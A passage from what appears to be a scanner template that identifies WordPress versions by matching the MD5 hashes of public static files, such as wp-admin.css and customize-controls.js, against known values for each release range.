dsl - name: 3.3.2 - dsl: - - "(\"628419c327ca5ed8685ae3af6f753eb8\" == md5(body))" - - type: dsl - name: 3.3.1 - dsl: - - "(\"c1ed266e26a829b772362d5135966bc3\" == md5(body))" - - type: dsl - name: 3.3 - dsl: - - "(\"e0f97110b60c3a3c71dcd1d4d923495a\" == md5(body))" - - type: dsl - name: 3.2.1 - dsl: - - "(\"98d3f05ff1e321dbd58ad154cc95e569\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"573e79628d2ee07670e889569059669e\" == md5(body))" - - type: dsl - name: 3.1.4 - dsl: - - "(\"fbebf5899944a9d7aedd00250bb71745\" == md5(body))" - - type: dsl - name: 3.1.3 - dsl: - - "(\"ccc403368e01b3c3b0caf28079a710a5\" == md5(body))" - - type: dsl - name: 3.1.2 - dsl: - - "(\"20f882b08b2804bc7431c0866a8999d1\" == md5(body))" - - type: dsl - name: 3.1.1 - dsl: - - "(\"5be6140fc3f44126b476dfff5bc0c658\" == md5(body))" - - type: dsl - name: 3.1 - dsl: - - "(\"f01635ffca23e49e01f47e98553ea75d\" == md5(body))" - - type: dsl - name: 3.0.6 - dsl: - - "(\"45119882b8d576a3462f76708b6bc1c5\" == md5(body))" - - type: dsl - name: 3.0.5 - dsl: - - "(\"ed20f283f2c1b775219bdb12e5c6ba93\" == md5(body))" - - type: dsl - name: 3.0.4 - dsl: - - "(\"c7a01d814ffbbb790ee5f4f8f3631903\" == md5(body))" - - type: dsl - name: 3.0.3 - dsl: - - "(\"0eb4f7981c3de98df925b3020c147a61\" == md5(body))" - - type: dsl - name: 3.0.2 - dsl: - - "(\"0538342b887f11ed4a306d3e7c7d6ea7\" == md5(body))" - - type: dsl - name: 3.0.1 - dsl: - - "(\"a73cac84b8b9a99377917a6974c9eea2\" == md5(body))" - - type: dsl - name: 3.0 - dsl: - - "(\"9ea06ab0184049bf4ea2410bf51ce402\" == md5(body))" - - type: dsl - name: 2.9.2 - dsl: - - "(\"6cfb514bbb51d883bb6fece65d5fd450\" == md5(body))" - - type: dsl - name: 2.9.1 - dsl: - - "(\"80c4ecc8630395baeb7363a7cf4dad33\" == md5(body))" - - type: dsl - name: 2.9 - dsl: - - "(\"1eaf3b4f4c2d039d26a473c0e0b5622e\" == md5(body))" - - type: dsl - name: 2.8.6 - dsl: - - "(\"027283d03b08abae67279fd17a37760b\" == md5(body))" - - type: dsl - name: 2.8.5 - dsl: - - "(\"f32252ef12c927f6285e4fb29efce04f\" == md5(body))" - - type: dsl - name: 2.8.4 - dsl: - - "(\"7d93c7feb3e2e2c2112474f92e3ee6f8\" == md5(body))" - - type: dsl - name: 2.8.3 - dsl: - - "(\"de32a1268d126ea71127ad5f9fa8f60d\" == md5(body))" - - type: dsl - name: 2.8.2 - dsl: - - "(\"ef8665ddd2d87badccb3532705b95992\" == md5(body))" - - type: dsl - name: 2.8.1 - dsl: - - "(\"7ed95e0b7ae663cbd0a8e77d787a4637\" == md5(body))" - - type: dsl - name: 2.8 - dsl: - - "(\"4a64408bdaaa6c8af7cab9346f0ce380\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"94c4cdfa20778d1bf9784941f9fca133\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"0377751ad219ccbb809d527952ff7325\" == md5(body))" - - type: dsl - name: 2.6 - dsl: - - "(\"5bca147a86a1d277328c298ab06b772b\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"c3024b888aeb1539f4c29df7b166d483\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"95803b846df1873416ee96c1577b3adf\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"939a797929aec1b8e0039014e9a29433\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"a5bc745849e1971abf8efb9a135ce764\" == md5(body))" - - type: dsl - name: 2.0.8 - 2.0.11 - dsl: - - "(\"ec9a2ffad38a3f0185aa6d9c0b8d6673\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.7 - dsl: - - "(\"010ac2a095f4d30b2a650b94cf3f8842\" == md5(body))" - - type: dsl - name: 1.5-strayhorn - 1.5.2 - dsl: - - "(\"aaa2d12586d9632c76b7b7f03d58a9f6\" == md5(body))" - - type: dsl - name: 1.5.1 - 1.5.1.2 - dsl: - - "(\"c60692ee8e176db0ac0be5ca69ba6c24\" == md5(body))" - - type: dsl - name: 1.2-mingus - 1.2.2 - dsl: - - "(\"6c3c457ed408be44244edc121cada9a2\" == md5(body))" - - type: dsl - name: 1.2.1 - dsl: - - "(\"75eaf1c4b267e11fffd42c34e8832567\" == md5(body))" - - type: dsl - name: 1.2-delta - dsl: - - "(\"790736d62d442117f9d28b64161919a2\" == md5(body))" - - type: dsl - name: 1.0.2-blakey - 1.0.2 - dsl: - - "(\"c91375254e9f56e45939ffcc28424c72\" == md5(body))" - - type: dsl - name: 1.0.1-miles - dsl: - - "(\"7ccd56b1c5b7123ed9afb222e6e93924\" == md5(body))" - - type: dsl - name: 1.0-platinum - dsl: - - "(\"6e08f4bfb7f79de78a3278f0f4ad981f\" == md5(body))" - - type: dsl - name: 0.71-gold - dsl: - - "(\"0c1e4a01d4ccf6dbedda30bf3c5eeb9e\" == md5(body))" - - type: dsl - name: 4.6.9 - 4.6.20 - dsl: - - "(\"22ff6681a981a59d29c22339e164c4cb\" == md5(body))" - - type: dsl - name: 4.4.13 - 4.5.23 - dsl: - - "(\"27ab6ce46fbbd0cf42bc22f13f2b2529\" == md5(body))" - - type: dsl - name: 4.2.18 - 4.3.25 - dsl: - - "(\"5eda30f3d56256140bb60e3a74a62b95\" == md5(body))" - - type: dsl - name: 4.1.21 - 4.1.32 - dsl: - - "(\"804455d5f94ca2dc7bb0821132d2c71b\" == md5(body))" - - type: dsl - name: 3.9.22 - 4.0.32 - dsl: - - "(\"f494518b64cf3bd7eb05d338f7b517c0\" == md5(body))" - - type: dsl - name: 3.8.24 - 3.8.35 - dsl: - - "(\"6f35fef364cb0dcae2bcb1ed9ff010ac\" == md5(body))" - - type: dsl - name: 3.7.24 - 3.7.35 - dsl: - - "(\"2cedb7a4d561a04923ba01f685d53148\" == md5(body))" - - type: dsl - name: 4.9.5 - 5.0.11 - dsl: - - "(\"55d27f1f9f7f79fa2593a5b32907ee44\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"8bab7518f58bde0cb9eaee02872d8a3f\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"8734f564e795dad3f234b79f58e899d0\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"c290bd03cbf76b858525f07d58925680\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"110d7bcc31f57903d611fcfa69c01d3c\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"ad262162850a9a80bf78ce0f52a3e629\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/wp-tinymce.js.gz" - matchers: - - type: dsl - name: 4.8.2 - 4.8.15 - dsl: - - "(\"c022b3c86a98fd5fca9c08a194dcff76\" == md5(body))" - - type: dsl - name: 4.8.1 - dsl: - - "(\"a7fb7552f7da68361ffa673546bb1efe\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"3bf7827cf5e51f105ac3c462be109a3d\" == md5(body))" - - type: dsl - name: 4.7.6 - 4.7.19 - dsl: - - "(\"1ae89b4f452465b662619b182f6f1c4e\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.5 - dsl: - - "(\"191e12b07c0ba85b743a465e40c55183\" == md5(body))" - - type: dsl - name: 4.7.3 - dsl: - - "(\"15c2b9ef65635dfc0ae35db3407f5c34\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.2 - dsl: - - "(\"9b37eea472171dbe52aceb909b81c292\" == md5(body))" - - type: dsl - name: 4.6.7 - 4.6.20 - dsl: - - "(\"f98ca0bdf5184d89e4efbe2451c9f3f2\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.6 - dsl: - - "(\"acd879c7ba04826969df23c5c9a8efb7\" == md5(body))" - - type: dsl - name: 4.5.3 - 4.5.9 - dsl: - - "(\"94bfaa271ff7909a2a79be05af4eae80\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.2 - dsl: - - "(\"fe49d6e2b566f613c3e485d3fad56b8b\" == md5(body))" - - type: dsl - name: 4.5.10 - 4.5.23 - dsl: - - "(\"89d7aecba16c8e5e06f54b47ff382783\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"40de3da265b56fb06463a946ccc6aa40\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.10 - dsl: - - "(\"60f3b6b1b2403654869b1232e35dfb92\" == md5(body))" - - type: dsl - name: 4.4.11 - 4.4.24 - dsl: - - "(\"39ef25c8879a357bf0580f50fac0c688\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.11 - dsl: - - "(\"ef12d9d3ef6c25d448e428619e49b730\" == md5(body))" - - type: dsl - name: 4.3.12 - 4.3.25 - dsl: - - "(\"2c1802232e52dcc43e6ea3624ae25302\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"b8177e0d45cb3b1f1f369148b64e9cdb\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"35190a121b43780c0893ed5e92a02d60\" == md5(body))" - - type: dsl - name: 4.2.2 - dsl: - - "(\"937d1ec0bf894d9686332fc3f71e6d22\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.1 - dsl: - - "(\"ce57362b7811e80becfe125cfafc1716\" == md5(body))" - - type: dsl - name: 4.1.5 - 4.1.32 - dsl: - - "(\"f3e951b15db00c5e82cb46f6d941104f\" == md5(body))" - - type: dsl - name: 4.1.1 - 4.1.4 - dsl: - - "(\"64fd6a9dd5366830074362d07d205018\" == md5(body))" - - type: dsl - name: 4.1 - dsl: - - "(\"66ff6b408c58c3207ff4b20e75ec5e68\" == md5(body))" - - type: dsl - name: 4.0.5 - 4.0.32 - dsl: - - "(\"e0a1a03f8f8c38df813528fe5bc7f913\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.0.4 - dsl: - - "(\"3966bc13b65d9487dc6772c615b05cd9\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"21f15ceb6c245e6dc0edc510761049ba\" == md5(body))" - - type: dsl - name: 3.9.6 - 3.9.33 - dsl: - - "(\"5e93aac0321c9a2b8e95e3826d32ba13\" == md5(body))" - - type: dsl - name: 3.9.3 - 3.9.5 - dsl: - - "(\"f094cea5fe2b1c870c662ff4794c589f\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.2 - dsl: - - "(\"de42820ca28cfc889f428dbef29621c3\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"1d52314b1767c557b7232ae192c80318\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"75f2e0d09c07216a86a99c3b6e6772a4\" == md5(body))" - - type: dsl - name: 3.7.1 - 3.7.33 - dsl: - - "(\"44d281b0d84cc494e2b095a6d2202f4d\" == md5(body))" - - type: dsl - name: 3.7 - dsl: - - "(\"b0bcf8091516db358ee9c833afd73175\" == md5(body))" - - type: dsl - name: 3.6.1 - dsl: - - "(\"cf4bbd562430a9bcbe735062be851be1\" == md5(body))" - - type: dsl - name: 3.6 - dsl: - - "(\"42ce18e88f1c21d4e991fcd431bcb606\" == md5(body))" - - type: dsl - name: 3.5.2 - dsl: - - "(\"a58dd12608659503cf087e879e720354\" == md5(body))" - - type: dsl - name: 3.5.1 - dsl: - - "(\"55c80a4794624ce9b94aa3631ad46c0b\" == md5(body))" - - type: dsl - name: 3.5 - dsl: - - "(\"8e529a971610d7ebe7851339c5cb3d67\" == md5(body))" - - type: dsl - name: 3.4.2 - dsl: - - "(\"ff19e44be975f89b647274d85b70f821\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.1 - dsl: - - "(\"0bdbc699dcd94bbf27740456e0c70ce2\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"7f8a7473d6a2a2d9816c6688dc4b0df8\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"a82a5f154aa92773bc69f1eab87fbfd9\" == md5(body))" - - type: dsl - name: 3.1.1 - 3.1.4 - dsl: - - "(\"54783b9eb731afb52deaa7b9363ab737\" == md5(body))" - - type: dsl - name: 3.1 - dsl: - - "(\"b412f1a6785cc7ef118bf2a9f473b318\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"aaef9189b58df07114fca6a31585aab2\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"953c4f11c4e771f648c1fe2d51c597fb\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"c57da9f509c04902726f6d3597789c58\" == md5(body))" - - type: dsl - name: 4.9.2 - dsl: - - "(\"3c27a95feefe245fc5c8c46427521f09\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.5 - dsl: - - "(\"b7af6b7e6c71dab43041eeb21108a8ab\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"a8c67704a82b41a42524d020b12b3b89\" == md5(body))" - - type: dsl - name: 4.9.8 - 4.9.16 - dsl: - - "(\"f789924dd9fbbd262ca2cadfba966702\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"ae0291326626c0f608f620ac31dd6c6e\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"ceb9ed0506ba955acda0e88cef60d26f\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"c191344939b4e7f2ddc2b75796d84e4f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/wp-admin.css" - matchers: - - type: dsl - name: 2.9.1 - 2.9.2 - dsl: - - "(\"7f6e4c1e4b7b6d0f6c5a33e63c89b8df\" == md5(body))" - - type: dsl - name: 2.9 - dsl: - - "(\"f27247eed86da668df2bfda806b64f7c\" == md5(body))" - - type: dsl - name: 2.8.1 - 2.8.6 - dsl: - - "(\"27cd5586d26660072c71e77a2e530496\" == md5(body))" - - type: dsl - name: 2.8 - dsl: - - "(\"c8890b0c8e534a2a8770b32fd1bca900\" == md5(body))" - - type: dsl - name: 2.7.1 - dsl: - - "(\"3fbd461d75443496e1dd6f2b3c9bce0b\" == md5(body))" - - type: dsl - name: 2.7 - dsl: - - "(\"d8368e8363d075d21a3bb37239c01755\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"32170b63ff23d8bcfc703e7f36c6912b\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"b084bcb3f80a884a197778a347b74b62\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"091a03c35dc57f391703e37367453fec\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"6e14567f0e63c4538953578bb95ded3c\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"cd8134a147e7105f539b171536b6fc12\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"e2f373fc95a33f5d995be0b7f930d394\" == md5(body))" - - type: dsl - name: 2.0.6 - 2.0.11 - dsl: - - "(\"76015d4b9339d6174aba14ca0283afbe\" == md5(body))" - - type: dsl - name: 2.0.5 - dsl: - - "(\"47479f0fd01b49b2012691cf5a11457e\" == md5(body))" - - type: dsl - name: 2.0.4 - dsl: - - "(\"cf3be0c31abbdd50a0826de6e3066f9a\" == md5(body))" - - type: dsl - name: 2.0.1 - dsl: - - "(\"030b95d77a6057ba4813e4a14766067e\" == md5(body))" - - type: dsl - name: 2.0 - dsl: - - "(\"d2d02d4b7b4ec10e3b3fecbf755f9a31\" == md5(body))" - - type: dsl - name: 1.5.1 - 1.5.2 - dsl: - - "(\"c6a1adba93cd3b259a0ae475ab92a028\" == md5(body))" - - type: dsl - name: 1.5-strayhorn - dsl: - - "(\"c8930878ee2f74c02d9f1fa2e8def669\" == md5(body))" - - type: dsl - name: 1.2.2 - dsl: - - "(\"c4a70611c37e423cc22892fd58c48ef2\" == md5(body))" - - type: dsl - name: 1.2.1 - dsl: - - "(\"b091ee8973313121b9e38552ef7809b0\" == md5(body))" - - type: dsl - name: 1.2-mingus - dsl: - - "(\"2c67006be8243807b644bdcc37cddb93\" == md5(body))" - - type: dsl - name: 1.2-delta - dsl: - - "(\"50206fb9d67a133304d59fd9d6ab3a4f\" == md5(body))" - - type: dsl - name: 1.0-platinum - 1.0.2 - dsl: - - "(\"8add712ec32385bae9ab167d993acca0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/customize-controls.js" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"f163c1c2c4cdfd95b025798510673c75\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"0683a5bd4a316d854985a3549ec60418\" == md5(body))" - - type: dsl - name: 4.7.5 - 4.7.19 - dsl: - - "(\"71654e9542dd10aa8078f8c005d2cb7e\" == md5(body))" - - type: dsl - name: 4.7.4 - dsl: - - "(\"e48c8805a07665ba778e5d63c9fcd0a1\" == md5(body))" - - type: dsl - name: 4.7.3 - dsl: - - "(\"d8598fe25595153923bf25bfb57eb4d7\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.2 - dsl: - - "(\"562e8a9067a62789ace0e21a1cb12efd\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"d89eff32867dbead906999d2d33df9dc\" == md5(body))" - - type: dsl - name: 4.6.6 - 4.6.20 - dsl: - - "(\"dcc637122733f05128df061051a6ab93\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.5 - dsl: - - "(\"520e79c175d3cde31d6cf1a68ef40e35\" == md5(body))" - - type: dsl - name: 4.5.9 - 4.5.23 - dsl: - - "(\"985654bfee750d913031aeb32ad5d72e\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.8 - dsl: - - "(\"38dcd3fd1e6f4a9e4503eb6eae7ae92f\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.9 - dsl: - - "(\"78b299ef2b76ea0769e84138c6c2a6d4\" == md5(body))" - - type: dsl - name: 4.4.10 - 4.4.24 - dsl: - - "(\"6ded237d8837729ba31bb538833c0553\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.10 - dsl: - - "(\"fba25769397927dace7ef2723e86c0a7\" == md5(body))" - - type: dsl - name: 4.3.11 - 4.3.25 - dsl: - - "(\"ee6e58fc6a055440e219557ad66b38aa\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"c48eef3773572618f27809300fae0cde\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.14 - dsl: - - "(\"7c0e981e54ea85d7971d0a9b25a9c263\" == md5(body))" - - type: dsl - name: 4.2.15 - 4.2.29 - dsl: - - "(\"979c54aa2966bbd7cb53e268fe75f3d8\" == md5(body))" - - type: dsl - name: 4.1.1 - 4.1.17 - dsl: - - "(\"ab54b0e9583b36100738905f0d3a531d\" == md5(body))" - - type: dsl - name: 4.1.18 - 4.1.32 - dsl: - - "(\"955c9e88cf52cec1bf7fd7521405dc25\" == md5(body))" - - type: dsl - name: 4.1 - dsl: - - "(\"edc5f50d0fd73a32d5b06790ffcab513\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.17 - dsl: - - "(\"3362df7d178d660d2108e554428dc01f\" == md5(body))" - - type: dsl - name: 4.0.18 - 4.0.32 - dsl: - - "(\"7a47f3f40fb6d9785cbd14e7b3c37e21\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.18 - dsl: - - "(\"fe12ea464a3c4656f6a37b1627b96089\" == md5(body))" - - type: dsl - name: 3.9.19 - 3.9.33 - dsl: - - "(\"f7929c798aedde2e8aabb3a12a1e7303\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"119ce8b94732f6eb170f8215aa65d47e\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.20 - dsl: - - "(\"9f2f8d7a1cce39d9f72bbb3928707d23\" == md5(body))" - - type: dsl - name: 3.8.21 - 3.8.35 - dsl: - - "(\"6c9e4bc36ce6c67a29e4bae09fba936b\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.20 - dsl: - - "(\"ab62b63d49366e5face06aa3e1547904\" == md5(body))" - - type: dsl - name: 3.7.21 - 3.7.35 - dsl: - - "(\"1880f5381359f05ad5c80f9aa2d60f59\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"80552729a4267ab8f23a521424da2d4b\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"0b77d6826fc7e62e2dba6145d0fc1ba1\" == md5(body))" - - type: dsl - name: 3.4.2 - dsl: - - "(\"c637cfded694d52045eb3235a7bf7303\" == md5(body))" - - type: dsl - name: 3.4.1 - dsl: - - "(\"aa0d38bd6f590ad8c3126074145b1bf1\" == md5(body))" - - type: dsl - name: 3.4 - dsl: - - "(\"b421960bde1ab1e1adfc822336103735\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"6b0f2e81ab83009e7d97de82e0fb679d\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.4 - dsl: - - "(\"bf3aac7d4a9dce03ec9dd7e993fac22d\" == md5(body))" - - type: dsl - name: 4.9.5 - dsl: - - "(\"6ac6b067db2d518fac0045c7195cddd7\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.0.11 - dsl: - - "(\"8dad23d14838a3e8600eff1bee809b2d\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"2e1c867bb53db1bd8c61c325f62779d1\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"5faaf1990588ef0b12c268e7c0e2262f\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"9eb22f3a04a29d89c59ed6d84b39410e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"60fd86fb779d8562016277fa549883c5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/common.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"311fefe1942d4341f5e75b322376750f\" == md5(body))" - - type: dsl - name: 4.7.5 - 4.7.19 - dsl: - - "(\"462a161d672f6a44beec251a7aa6c8d8\" == md5(body))" - - type: dsl - name: 4.7.3 - 4.7.4 - dsl: - - "(\"90444dc44a63c22d91d12278c033d4ea\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.2 - dsl: - - "(\"30e4449aa544e1648d23ed7c2d1a5423\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"dbd27f153db56b47b84856cb1e41d7bb\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"0b5a51ad30a18d0328f17c2616da58a2\" == md5(body))" - - type: dsl - name: 4.4.1 - 4.4.24 - dsl: - - "(\"a572dd4154d97d362c76879e8e54dd58\" == md5(body))" - - type: dsl - name: 4.4 - dsl: - - "(\"6cff03191d6f406ced50cfa51737f4b6\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"42612bfbee1791a7f347ef3b289f7b4e\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"fb3c19d5e908c23df77247918adbc413\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"dc9e2fa5c5e058e9a9466f48322e0f32\" == md5(body))" - - type: dsl - name: 4.1.1 - 4.1.32 - dsl: - - "(\"c9ae6d908e595b6f14b7aa2ad86000d2\" == md5(body))" - - type: dsl - name: 4.1 - dsl: - - "(\"32fb4510695e27473897cb5251348395\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"2830c37f0e53cd900bce37ec46e29ddc\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"72c3d94d42bb4c900a1436d17c156e67\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"60a507d4bbba0d8720af1741454c299a\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"1735dc0877bf1b36a76289168dd93b41\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"35767af35006b75866e3a5806ab6496f\" == md5(body))" - - type: dsl - name: 3.6.1 - dsl: - - "(\"03eaffeef39119f0523a49c7f9767f3b\" == md5(body))" - - type: dsl - name: 3.6 - dsl: - - "(\"2637ea6c99869af4bd6e4a49519601a7\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"af42e7400403ae6f09811b24724dc076\" == md5(body))" - - type: dsl - name: 3.4.1 - 3.4.2 - dsl: - - "(\"6cedcf29a7ee4b373ed45b359210b149\" == md5(body))" - - type: dsl - name: 3.4 - dsl: - - "(\"18b6dcc3aec207acd021ff01f04f9e6c\" == md5(body))" - - type: dsl - name: 3.3.1 - 3.3.3 - dsl: - - "(\"6fa561d1ded6a9c6beec672642f12436\" == md5(body))" - - type: dsl - name: 3.3 - dsl: - - "(\"4516252d47a73630280869994d510180\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"57b1d1d19fdd9511131c71c51401af47\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"df619a8eb3ac90caded086e6415d9413\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"2d55e645db78f330a6d5e9cefa039e62\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"ce3727017cbcf96de2cff9110b42ea94\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"2b623d55968742539ffde9ff9416bb29\" == md5(body))" - - type: dsl - name: 2.7.1 - dsl: - - "(\"4f0f9bdbe437f850430fae694ca046ba\" == md5(body))" - - type: dsl - name: 2.7 - dsl: - - "(\"3e3e8da7ed4e97776c76ca0c792d1a85\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"7265e623f77644f067b0f40de7a8262a\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"6c175816ac122145e3d941fd3607bacb\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"450660797205ec498b60c20e63b31b6f\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"6925251401e3b9e69ef7950fdb34c6e9\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"4574fca70d9d122ca8a0505cc17a44e2\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"a189cdd52ffd54cca91d202615612872\" == md5(body))" - - type: dsl - name: 5.5.1 - 5.5.3 - dsl: - - "(\"72027ea41a37cbd5dc9909ed143fed50\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"eba4c4117c3cbc15a6f457b9c1716872\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/customize-controls.min.js" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"8c9d0ff945cc23eb2c0d6ca6f0d344c6\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"32d18988e048936443961fa91f3ae990\" == md5(body))" - - type: dsl - name: 4.7.5 - 4.7.19 - dsl: - - "(\"8a0d38ad2a3ba06c2933629be5497559\" == md5(body))" - - type: dsl - name: 4.7.4 - dsl: - - "(\"c58c70935cb1028d58e6f3fd87c209b0\" == md5(body))" - - type: dsl - name: 4.7.3 - dsl: - - "(\"55c9454a7813e7bdf75fe74efa3f5916\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.2 - dsl: - - "(\"0e9f7464783db8eec0a3629791448575\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"13ec0e9534db67402cd8e3de6e2ebaeb\" == md5(body))" - - type: dsl - name: 4.6.6 - 4.6.20 - dsl: - - "(\"949fc12a5224b4472f9db582f20f1a77\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.5 - dsl: - - "(\"e5063f2033a90df6fcfb3e0c53644da8\" == md5(body))" - - type: dsl - name: 4.5.9 - 4.5.23 - dsl: - - "(\"25c0fd5be25b8e76aa416db9c7219a76\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.8 - dsl: - - "(\"14749abf568a231c66bc8d7b086a32ac\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.9 - dsl: - - "(\"a3aa2d6d49a4e4b8ab1256c809722cce\" == md5(body))" - - type: dsl - name: 4.4.10 - 4.4.24 - dsl: - - "(\"4fd5dc4a5c6b1c33c27a0275e88d972f\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.10 - dsl: - - "(\"d802579942fc0bf5f30c8f487cc763ff\" == md5(body))" - - type: dsl - name: 4.3.11 - 4.3.25 - dsl: - - "(\"62a3187ffd7165378860d5b028e3d23a\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"eeffa28eb1d02c9852c4629192a2ad08\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.14 - dsl: - - "(\"fa9142f8d88f8566d3dd0b40b602ce2e\" == md5(body))" - - type: dsl - name: 4.2.15 - 4.2.29 - dsl: - - "(\"a61c630a083abd9666cf893fe6d047ca\" == md5(body))" - - type: dsl - 